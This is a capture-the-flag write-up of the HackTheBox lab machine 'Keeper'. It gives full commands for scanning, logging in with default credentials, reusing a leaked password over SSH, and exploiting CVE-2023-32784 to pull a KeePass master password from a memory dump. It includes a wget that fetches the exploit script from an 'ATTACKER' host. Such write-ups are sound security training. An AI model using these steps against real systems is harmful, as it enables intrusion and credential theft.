>the Breaker && the Fixer

HTB - Keeper

πŸ“… 14/04/2026 Easy HackTheBox

Keeper HTB Machine

🧠 Enumeration

We start with a full scan:

nmap -p- -T4 --min-rate 5000 -sV -sC -O -Pn -sS 10.10.11.227 -vvv

Open ports:

*80 (HTTP) *22 (SSH)

Nmap

The website redirects to:

tickets.keeper.htb/rt/

🌐 Web Enumeration

Typical problem: it did not resolve the domain.

sudo vim /etc/hosts

We add:

10.10.11.227 tickets.keeper.htb

Hosts


πŸ’₯ Login Panel

Login with Request Tracker version is detected.

Tried SQLi (CVE-2013-3525) β†’ not helpful.


πŸ” Default credentials

user: root
pass: password

πŸ‘‰ Access achieved.

Login


πŸ‘€ User enumeration

User found:

lnorgaard

Interesting comment:

Welcome2023!

Leak


πŸ”‘ SSH Access

ssh lnorgaard@10.10.11.227

: ⚠️ Important:


πŸ“¦ Interesting files

RT30000.zip
unzip RT30000.zip

Content:

Files


🧨 KeePass exploitation

CVE:

CVE-2023-32784

Allows you to recover password from memory dump.


🐍 Script

python3 -m http.server 80
wget http://ATTACKER/keepass_dump.py
python3 keepass_dump.py -f KeePassDumpFull.dmp

Dump


πŸ” Password recovered

rΓΈdgrΓΈd med flΓΈde

πŸ”“ Open KeePass

sudo apt install keepass2
wget http://victim:8080/passcodes.kdbx

Open with the passphrase.

KeePass


πŸ§‘β€πŸ’» Root

We convert key:

sudo apt install putty-tools
puttygen idkey.ppk -O private-openssh -o id_rsa
chmod 600 id_rsa

πŸš€ Final access

ssh -i id_rsa root@10.10.11.227

Root


🏁 Root flag

cat root.txt

🧾 Conclusion

Machine focused on:

πŸ‘‰ Small bugs β†’ full access